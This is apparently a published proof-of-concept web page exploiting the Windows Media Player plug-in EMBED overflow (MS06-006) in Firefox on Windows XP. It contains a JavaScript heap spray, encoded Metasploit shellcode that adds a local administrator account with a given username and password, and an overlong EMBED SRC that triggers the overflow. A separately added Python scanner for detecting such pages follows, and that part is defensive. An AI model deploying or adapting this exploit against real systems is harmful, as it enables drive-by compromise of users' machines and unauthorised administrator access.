<HTML>
<HEAD>
<TITLE>WMP Plugin EMBED Exploit</TITLE>
<SCRIPT>
// Windows Media Player Plug-In EMBED Overflow Universal Exploit (MS06-006)
// By Matthew Murphy (mattmurphy@kc.rr.com)
//
// DISCLAIMER:
//
// This exploit code is intended only as a demonstration tool for
// educational or testing purposes. It is not intended to be used for any
// unauthorized or illicit purpose. Any testing done with this tool must
// be limited to systems that you own or are explicitly authorized to
// test.
//
// By utilizing or possessing this code, you assume any and all
// responsibility for damage that results. The author will not be held
// responsible, under any circumstances, for damage that arises from your
// possession or use of this code.
//
// Tested:
// Firefox 1.5.0.1
// Windows Media Player 10
// Windows XP SP2 (US)
//
// The Windows Media Player plug-in for non-Microsoft browsers (Firefox,
// Opera, etc.) suffers from an exploitable overflow in its handling of
// EMBED tags. Specifically, a very long SRC property on such a tag can
// lead to an overflow that will corrupt a structured exception handling
// frame.
//
// The SEH frame is the vector of control that I exploit. Fortunately,
// DEP is turned off for non-Microsoft code, so there's no issue there.
// That's really a shame, because such a move would've made an already
// difficult exploit much harder.
//
// One of the reasons the exploit is tough is because the overrun buffer
// (the SRC attribute) is seriously mangled before it is handled by the
// plug-in. In particular, any character with the sign bit set (> 0x7F)
// is replaced.
//
// We could do as the creative wizards like HD Moore suggest and use an
// alphanumeric payload with some cute SEH tricks. Let me rephrase:
// YOU could do as the creative wizards suggest. Meanwhile, I'm perfectly
// content to throw my code in another buffer and get around all the silly
// alpha-numeric sanitation. Sure beats devoting hours to beating it
// with fancy shellcode, all for a PoC I may never release.
//
// Instead, I shamelessly ripped a page from Skylined's book and borrowed
// (and cleaned up) the heap spraying technique. My heap-spray is a lot
// less precise, because the memory layout is a lot more variable. In
// my experience, it took a _HUGE_ block allocation to get the heap I
// wanted to jump to into a reliably-placed location. Hence the atrocity
// of the 16MB of noops below.
//
// Aside from the character restrictions, this is a standard stack-based
// overflow. I simply smash the SEH frame with a pointer to my HUGE heap
// block, which consists of a bunch of 0x41 characters. An INC ECX is a
// functional noop -- so the box takes the slide down the heap into the
// shellcode. The shellcode is a standard Win32 "add administrator"
// payload from Metasploit.
//
// This exploit is a lot of ripping, cleaning and re-implementation, but
// that just goes to show how easy it is to write. So... how about that
// 'Important' rating? A bit perplexing to rate a "click-and-own" as an
// Important... or is it just because nobody would *DARE* run one of those
// "Non-Microsoft" browsers on Windows? :-)

// Spray the heap
var spray = unescape("%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141");
do {
    spray += spray;
} while (spray.length < 0x1000000);

// If this is successful, you can login as a local admin:
//
//    User: wmp0wn3d
//    Pass: password
spray += unescape(
    "%uc933%ue983%ud9c9%ud9ee%u2474%u5bf4%u7381%u9713"+
    "%u798c%u839b%ufceb%uf4e2%u646b%u9b3d%u8c97%udef2"+
    "%u07ab%u9e05%u8def%u1096%u94d8%uc4f2%u8db7%ud292"+
    "%ub81c%u9af2%ubd79%u02b9%u083b%uefb9%u4d90%u96b3"+
    "%u4e96%u6f92%ud8ac%u9f5d%u69e2%uc4f2%u8db3%ufd92"+
    "%u801c%u1032%u90c8%u7078%u901c%u9af2%u057c%ubf25"+
    "%u4f93%u5b48%u07f3%uab39%u4c12%u9701%ucc1c%u1075"+
    "%u90e7%u10d4%u84ff%u9292%u0c1c%u9bc9%u8c97%uf3f2"+
    "%ud3ab%u6d48%udaf7%u63f0%u4c14%ucb02%u7cff%u9ff3"+
    "%ue4c8%u65e1%u821d%u642e%uef70%uff14%ue9b9%ufe01"+
    "%ua3b7%ubb1a%ue9f9%ubb0d%uffe2%ue91c%ufbb7%ueb14"+
    "%ufba7%ua817%uacf3%ufa09%uffe4%uf40e%ue8e5%ub459"+
    "%uc8d6%ubb3d%uaab1%uf559%uf8f2%uf759%ueff8%uf718"+
    "%ufef0%uee16%uace7%uff38%ue5fa%uf217%uf8e4%ufa0b"+
    "%ue3e3%ue80b%ufbb7%ueb14%ufba7%ua817%uacf3%uda56"+
    "%uc8d3%u9b79"
);
</SCRIPT>
</HEAD>
<BODY>
<EMBED SRC="------------------------------------------------------------- --------------------------------------------------------------------------------- --------------------------------------------------------------------------------- --------------------------------------------------------------------------------- --------------------------------------------------------------------------------- --------------------------------------------------------------------------------- --------------------------------------------------------------------------------- --------------------------------------------------------------------------------- --------------------------------------------------------------------------------- --------------------------------------------------------------------------------- --------------------------------------------------------------------------------- 
--------------------------------------------------------------------------------- --------------------------------------------------------------------------------- --------------------------------------------------------------------------------- --------------------------------------------------------------------------------- --------------------------------------------------------------------------------- --------------------------------------------------------------------------------- --------------------------------------------------------------------------------- --------------------------------------------------------------------------------- --------------------------------------------------------------------------------- --------------------------------------------------------------------------------- --------------------------------------------------------------------------------- --------------------------------------------------------------------------------- --------------------------------------------------------------------------------- --------------------------------------------------------------------------------- ---------------------------------AAAABBBBCCCCDDDDEEEEFFFFGGGGHH HHIIIIJJJJKKKKLLLLAAA NNNNOOOOAAA QQQQRRRRSSSSTTTTUUUUV VVVWWWWXXXXYYYYZZZZ00001111222233334444555566667777888 89999.wmv"></EMBED> </BODY> </HTML>
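As an added, defender-side example (not part of the exploit file above): a small Python scanner for HTML content that flags the three indicators this page combines, an EMBED SRC far longer than any plausible media URL, a self-doubling heap-spray loop, and a long run of %u-encoded units with a repeated NOP-style unit. The thresholds and the two sample pages are constructed for this example; the suspect sample mimics the shape of the page without carrying any real payload.

```python
import re
from html.parser import HTMLParser
# Thresholds are assumptions made for this example, not values taken from the exploit.
MAX_SANE_SRC_LEN = 1024      # an EMBED SRC longer than this is not a plausible media URL
MIN_SPRAY_TARGET = 0x100000  # a self-doubling string grown to >= 1 MiB looks like a heap spray
MIN_UNICODE_UNITS = 64       # this many %uXXXX units in one page's scripts suggests shellcode
# "do { X += X; } while (X.length < N)": the doubling-loop shape JavaScript heap sprays use.
_SPRAY_LOOP = re.compile(r"(\w+)\s*\+=\s*\1\s*;?\s*}\s*while\s*\(\s*\1\.length\s*<\s*(0x[0-9a-fA-F]+|\d+)")
_SLED = re.compile(r"(%u[0-9a-fA-F]{4})(?:\1){3,}")  # one unit repeated 4+ times: a NOP-style sled

class _Collector(HTMLParser):
    # Collects EMBED SRC lengths and raw <script> bodies; HTMLParser lowercases tag/attr names.
    def __init__(self):
        super().__init__()
        self.src_lengths, self.scripts, self._in_script = [], [], False
    def handle_starttag(self, tag, attrs):
        if tag == "embed":
            self.src_lengths += [len(v) for k, v in attrs if k == "src" and v is not None]
        elif tag == "script":
            self._in_script = True
    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)

def scan_html(doc):
    # Returns a list of human-readable findings; an empty list means no indicator fired.
    c = _Collector()
    c.feed(doc)
    findings = []
    for n in c.src_lengths:
        if n > MAX_SANE_SRC_LEN:
            findings.append("oversized EMBED SRC: %d chars" % n)
    js = "\n".join(c.scripts)
    for m in _SPRAY_LOOP.finditer(js):
        if int(m.group(2), 0) >= MIN_SPRAY_TARGET:
            findings.append("heap-spray loop on '%s' up to %s" % (m.group(1), m.group(2)))
    if _SLED.search(js):
        findings.append("repeated %u unit (NOP-style sled) in script")
    units = len(re.findall(r"%u[0-9a-fA-F]{4}", js))
    if units >= MIN_UNICODE_UNITS:
        findings.append("%d %%u-encoded units in script (possible shellcode)" % units)
    return findings

# Constructed sample pages for the example (no real payload): one benign, one exploit-shaped.
BENIGN = '<html><body><embed src="clip.wmv"></embed></body></html>'
SUSPECT = ('<HTML><HEAD><SCRIPT>var s = unescape("%u4141%u4141%u4141%u4141");\n'
           'do { s += s; } while (s.length < 0x200000);\n'
           's += unescape("' + "".join("%%u%04x" % i for i in range(70)) + '");</SCRIPT></HEAD>'
           '<BODY><EMBED SRC="' + "-" * 3000 + '.wmv"></EMBED></BODY></HTML>')
```

Run on the exploit page itself, the same scanner fires on all three indicators, since the 0x41 spray, the 16MB doubling loop and the concatenated %u literals all match without any signature for the specific shellcode bytes.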